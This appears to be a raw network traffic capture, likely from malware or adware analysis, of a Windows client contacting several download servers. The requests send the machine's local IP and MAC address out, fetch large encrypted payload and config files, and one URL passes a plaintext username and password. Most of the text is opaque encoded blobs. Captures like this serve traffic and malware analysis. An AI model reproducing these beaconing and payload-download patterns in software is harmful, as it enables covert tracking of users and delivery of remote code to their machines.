vSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4neby
iCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Ob
a8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT0
1I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1i
mxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq je
NXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTR
bs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapa
jXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<< skipped >>>


GET /txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 111968
Last-Modified: Tue, 22 Sep 2015 02:26:44 GMT
Connection: close
ETag: "5600bc64-1b560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wr
MOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3
TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3
dBEoYcUYdhA1na912G4GnwNPyGigPuwU4WnDUHq/HLA1JSzVcV7qGonkM3kaB6fPbglycn
0DaQTrXm/H8aJaRsqeb8fxolpGypNTPeVZu3tFqtj4tOAGKUF sMaJudVXlW6wxom51VeV
ZRJhvIVRruRJIWa4B0YS20w3O2oa8Ns9uggHzpTR0yccTazQ2ZSPlrxNrNDZlI WvI/pOI
CuWZe8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk l
eK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ75v2Ipn 4qo34DqKck/Lvt8TazQ2ZSPlrEk
Yhq4qBTrw/Rp3LuKWWWAJO4gv6AT3UO7thRRNagkrE2s0NmUj5a3C2I9Jaq5QixNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oQQoy6/oPEBqxo0 qZuAtWoPgJ yR1ZwZZREMMJf0vpc4SZ8ce zsmIwA6jAbzQgABzI
bqI92FStTOY2Qoonvg2rVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r
648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ4Ods4aXXBrdpBepmeh2dZe/TnDXSN51O5
<<< skipped >>>


GET /tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=gb2312
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 1
1....


GET /deploy.php?ConFig=xz9 HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 2
9eHTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/7.5.
.X-Powered-By: PHP/5.3.6..Date: Wed, 11 Nov 2015 11:17:50 GMT..Content
-Length: 2..9e..



GET /txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:41 GMT
Content-Type: text/plain
Content-Length: 433608
Last-Modified: Fri, 06 Nov 2015 14:22:14 GMT
Connection: close
ETag: "563cb796-69dc8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjTh
fOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTa
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4
bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK 
pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHB
OK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMax
jFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRS
I7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5
PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E
7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>


GET /plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Wed, 11 Nov 2015 11:18:03 GMT
Server: Tengine/2.0.3
Content-Type: application/octet-stream
Content-Length: 1549
Expires: Wed, 11 Nov 2015 11:18:03 GMT
Cache-Control: max-age=0
X-Via: 1.1 bl15:2 (Cdn Cache Server V2.0)
Connection: close
....<.......`-8...\.Q...V.i..`-*......................-............
....................................T.................................
......................................................]...`..........a
....a..<....h2zov."uu&e9".z-...B....WJB.E.MYNjDn..Bok"atvxvu(r.RY._
Q.C2:/|lK.....k....p...0j...)...$...zV....................,.../p9*t?..
'XVI.AoFGP..Y......WW]*|(:n.BUG82qyb...................`...`..._..Z.sE
. d.....9....gO.....YV.ZM.".G>....P..5ng._......V..scJ..]..rfgw 4#=
'F.N5m;zr=o0\.....h...D...R..#.........-_.....D,.14#q>y)[t3#4=tQ.4.
...........................................................j..........
.".4..0L....A.....U/w< >q`y(W.7..2jzU5...I}!{2&dNk$re, .;t>w*
#h7rz4 #}w"p{WWAZ.t!4A5f:2=#\LG.......h....E..K......W.0...!......ER5'
.W..C1)5dN ."2H4......................................................
......f.......T..:._...\.r*.........................3...H.UD8i..80}g=l
p^[email protected]( 4w! 9. zD0=$74a{>&y(92}D.S.....c...P(...v..P.Yr.U...."..
...................2...|lkz!$ME..&yjz3/he#. D...W.IFE.R6)Y._P\...d...A
.)>.....q...`.!....7.&.Vz...Y.Y.....vuH..R.P...5q}LR{f%ybV< ...a
?ud.I&'..]G.]so(%.t}34...^..)h<i..X....Nqm..../ty~n.... {:h.sl...L.
.......&h..|@.V$7......Fw6b4$.;.W!.SIzw=;tb~1.3...`2}%&d..AJ^Fw1"..^.1
=a^.D...IYT. Y..YF.J..\....(i]{.....X...`...F.S......h.4..B.....O...I'
...2-.....................................................]...`U..)..o
e..=..p...u.......,6R,(n].`,...<, :ad..RGf9*:so(%cM`.MIY[E.ZM,W:j;x
2;*....5....{mqdV.].......%.. Fm..o...........UMZ..&<0dV.X.V..&
<<< skipped >>>


GET /txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 3681632
Last-Modified: Wed, 11 Nov 2015 06:37:41 GMT
Connection: close
ETag: "5642e235-382d60"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnK8LkCEjjVuY w9ubR7oMGJYDX66FKP95lKsnSGyz
q37ryciPXfvjMPpcqzf2tJHexhfLNc fok6tpr37HNZkoDA9b8f9QQXkBG dX3CMR0/NFC
P83aLsI5BiAzHCQ3JAlQ4FJlQ856TPZm3LkrIF6N30ifaKq p83E2s0NmUj5a X5Vy1wuS
R9dWtS4hPXoQyM IdytADpRVo8JE43dQFFipIaFHMmto3ZU4PHim6WzGQ7DQYttXN9lycn
0DaQTrWJvgEYtUqAbYm ARi1SoBt9qL31Z27Nj27cK3hD49V5esMaJudVXlW6wxom51VeV
ZRJhvIVRruRMTazQ2ZSPlrCvj4xkq/yU dGfvGf0Yne8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a94BsqzULTQfxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay
2oS4kGYrQWxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6  P0P  g8Q5mb8w4ic
KoxcxNrNDZlI WsxOHUkBOoRd2lephKWY2T1ZZGE77pEw2mANord1TbnucTazQ2ZSPlr6p
KcJrWMBIP1qhO0HLK1lmKAsO86F254kLg6MOgYGj/E2s0NmUj5a3C2I9Jaq5QiP0ady7il
lljiF3sq2aCnyzX0okfCmeuexNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a9SIyelpSHqnq1q0Btc2nwSKz5eXbq 3w0SO
47vccmRiCV8k2Qip9g2z6Qsnr5fEBHZURWDBkbGIFM2XpBtTMgGe6Uq978GK26oCTYylcP
SYk0BRHzuKCIFn44m2tyaRZ1koSJZKpXd/OHf 9s28bCOsp5XACOqJfX5nhXmBTF9k
<<< skipped >>>


GET /txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMl
j6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj
8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WuxjdyElk00EWwpPpmkWxL592DT6wOksX0Rk/JftCpZs7/GFJwYdLxNbjVK
k 3PqZ6J LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73tufks1XoWa
brDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5ayjiTpfmIKRl2EZHKlVEuV3E2s0N
mUj5a8TazQ2ZSPlr8q6ATLe0BDo1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gl3prqnwQ6ppxNrNDZlI WvE2s0NmUj5a gQ7yxf
KZOvo8xQR0ILcHUY4PBMHSsLbMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9QYrGSLdEvLVSB
J/sSRlK6PE2s0NmUj5a qSnCa1jASD9aoTtByytZaZMFVEBXlS//3riYRXWEIuxNrNDZlI
 WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOkm/hbVWe7aCN8TazQ2ZSPlr8/NtRTCxZ I/Rp
3LuKWWWBOVAnZ1Gp5T936SD5tpBgXE2s0NmUj5a qSnCa1jASD 8BgGQTR5rXlvLiHddua
D uVnYBpGHdzxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7u6dY8N0fVQjTBg4AZJAmXzAW
uIVAOwWVRWgwWG/PzhWCZHG4tjpXwY8EePoyNjE9bQuOOiksOFys92Mb990zgH 9dcpHTN
4oJH82bDLsUnnb8xYIKL6268 iq1CD6QKcyoahwQZemE7qDQdPE4 6Ew1OPiQ9gr3A
<<< skipped >>>


GET /txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:48 GMT
Content-Type: text/plain
Content-Length: 2198880
Last-Modified: Thu, 18 Jun 2015 01:46:51 GMT
Connection: close
ETag: "5582230b-218d60"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnL  k7DvPs3WjXk7SpQ15d7jJanjjC84vAhwYDSjO
YxjLntlYG xDPkOtcC9tO841wTXAMmIvkygIBtWwdDYF4q5XRI7ZGVRlWYksgPP6AN16z9
g/z8gXEfKLrJrovlO7LE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH2opEaPJrOTroz4h3K0AO
lF0xwWtDAuHIW wHOn1s4MYbXo/OU7PvgNsuRvGWEC5TiXJyfQNpBOtYm ARi1SoBtib4B
GLVKgG3Cfiy1bVioF8cfi/GUwqfa6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
siuRd8jl1vezouKXPQhqxaxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvdYieTWj/98sTazQ2ZSPlr9t4Tl IHES7E2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9ayT1Lrtc3gKkE5OkoGqK/E2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPXF8/zuqkGzfJgvhj6kGQ08xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW8f
8VESpL8m4dJnx/A/B6/8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWJ3t6N9bK/kMm1FSikOK
LpHE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5DV89XbEJ50B10OT1XCNS8KQo3SDfccki1K
0oMuEGS FKNR1Tqt32KnQRoV7CxP OdSc2AQjQ4eTNulgi4jGACKspxO5/VLgi5B1WxoKL
egzIDHLzyxyGKsgm6nQO23QwErsKmAX434bv0We9PqRZmUZ Y19 ufMHLyQ0YFPMVj
<<< skipped >>>


GET /txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:34 GMT
Content-Type: text/plain
Content-Length: 247176
Last-Modified: Wed, 04 Nov 2015 14:11:46 GMT
Connection: close
ETag: "563a1222-3c588"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROpmsCvGM4F5O 0H8fI6LU0SnT9JQBtwTKo isNV
tIVfyikHs314aQEo8WnGgaYNOYti7JbybwbjXtDLUztYgLDGYIyvVpneJpjxacaBpg05hH
qQn0vWUMNAxHJLkgqqbtXsWSFpCFXznYaWnJyiqVTQYisCkYbszfjxacaBpg05i2LslvJv
BuNf5/ 1gVd/aPFaicSzkOlLdWu16IMN5EZPSbAmHPWu2VwxKdPaxzM4ARzYrMdK4Wgapq
7QaHDbBH9YOLT4VPwHfkN9pOcSW92/ H/y8AHjmYlX5LzBPSWrCqau0Ghw2wR7kX31v3lm
cY/EeR7wuX05CO1w7MsCkWC/YpWIYAC31vP0zvj66M6MasC9rb4ePfGm1fp/9EdCb4jnBa
oIWSy03YRRfh6CNlJDNv8 xdd0TLy7oI1BJLIN0CKwrGLQpTsLJtPHh85eLwE67KQoPir 
eXUwtsLHqK/MMRdAUG3dt3mKZVGBprisj6ATJ0Pz1T0J1YUMOTo3T5veee2A6MjQcNJgZy
THURsPxuw/bfnjUXiHx7L/Gsjldgifr6FBvzIp7Oll4I4yBYQLLDOhQE03YcR1OIgCF2ey
AUtqVkwDf4/YP3OWe5YCxb0/YljczczPctBAhbjUDsvMrryXPKjJxJ3I33F/4UdU1N3e0D
lO1FiXfjISZZCN/26i/6qcqiLFbQ6HCc4z7Iol75n6dLEkiVAWvLmEXezW23xsVS5EQhw5
qOejY4ZYfmAV i0kvP0B68M9BcjQNaY0cbtKVkPGYW8c8XA0DXy1vj65gYfuA4cdxlJblU
td1g6QEX4DmoAWWbV7isPPspjY7MPehWqjDK0uJdU8znJKqgWb0Bo ydstzUbnzYc8fqIB
2qZ3Wvg7T m2uQMJX1Wp/A0QXR9fvb6am/3VfiqQNIq BjFmOf3Q1Z 7vLpgNgFmUb8hbl
EqwCYKxJdChUOYzpOrPssFok3SoqjajGVW8icwZ4oqcgwoVWldF61vikzxRKZTYg vnyku
5NNfvVoh/VyXuYcZDDE3aiauCeIvQof5wCjDRqb8TnP4LYC /waDknwVWNsbtz2QQdajxU
pR5AlhMsgfCOWEBw5Xn/OB9RWfAB4dDmsvYR0z2VvfKH3pLD685Vdc4Orc9IR7Q5D6MqT5
ItJJ0qtpHmG1gs3lYwkSwCX15xZ2xRW2vOixgQjGOi2IHE8d0VuddZvqrbbaPHyRN35Dnm
vT6xagZIbDBWNAHqNUKZcBcVr5/MDM3UVz2SuRPhEwtjkQRnvQ4nBh4eP7sHKkDpGa4mHr
r8/xvj9jPDHw/Mjl6RXtxu2cXzLjCLiPbgmKpv9nXFhvvB/zZqMDsH27jObAFz6WviISiE
my2BrFKcCAv8GKvty 7XkKg/YWMNT/nyku5NNfvVZHKSiDqAZaxRoqcW57iew5/5lNjMkm
6/uAMcPA58c9DJg4zDj5Sv5ClmIuib87U6khvN9v49V/2PxjmnEn6uEEtkN1NP9JWy
<<< skipped >>>


GET /txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 684044
Last-Modified: Wed, 24 Jun 2015 10:44:45 GMT
Connection: close
ETag: "558a8a1d-a700c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvAblegbVkE3QksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnL8sFrZ6ScHQdh2Uj5tr5A5VTJW5rSxUYwBJJMoO9
Bc7sUyLDFIXqMZC3CgFBCbdFr0sWYbC8Wp6yQl26h5WnPxqBJNc UpnuDjERuftzRF72x3
xK DN ZbpznHoTXLxPSRe5YgD72LMOyEo87S0SemMaVw3Z/FrdteueXiWsJQ9C979Xf4K8
3Kpmj7WLBdPjjE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxKvNkFlBxUMrfdg0 sDpLF9wjBV
spUOVn3e28nV1s3Q7uOGK1sSqvG9kjmdVnettaSXJyfQNpBOtSscWDuPDWx/KxxYO48NbH
8rmvTShj4cTdlVvCrfQXkn6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI Ws2WyVS
GWEulsKFk4YKyzx6xNrNDZlI WvE2s0NmUj5a5sWWGLR964b7hS7RjImYJXE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrMjKhtrhBipDE2s0NmUj5a8TazQ2Z
SPlrxNrNDZlI WvoEO8sXymTr/hZOVmqZR7/0iNwSnoKul3E2s0NmUj5azE4dSQE6hF3aV
6mEpZjZPVy63fWnEfdS 3vHuuOQ4TExNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW9dWmDiOW
Wmddr2GhIVxawMTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBI02AJZ6GJA0W7tytP5KGfE2s
0NmUj5a qSnCa1jASD 8BgGQTR5rWmfMTRPQazMr mYkEn66z9xNrNDZlI WtlbVeP21o8
lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
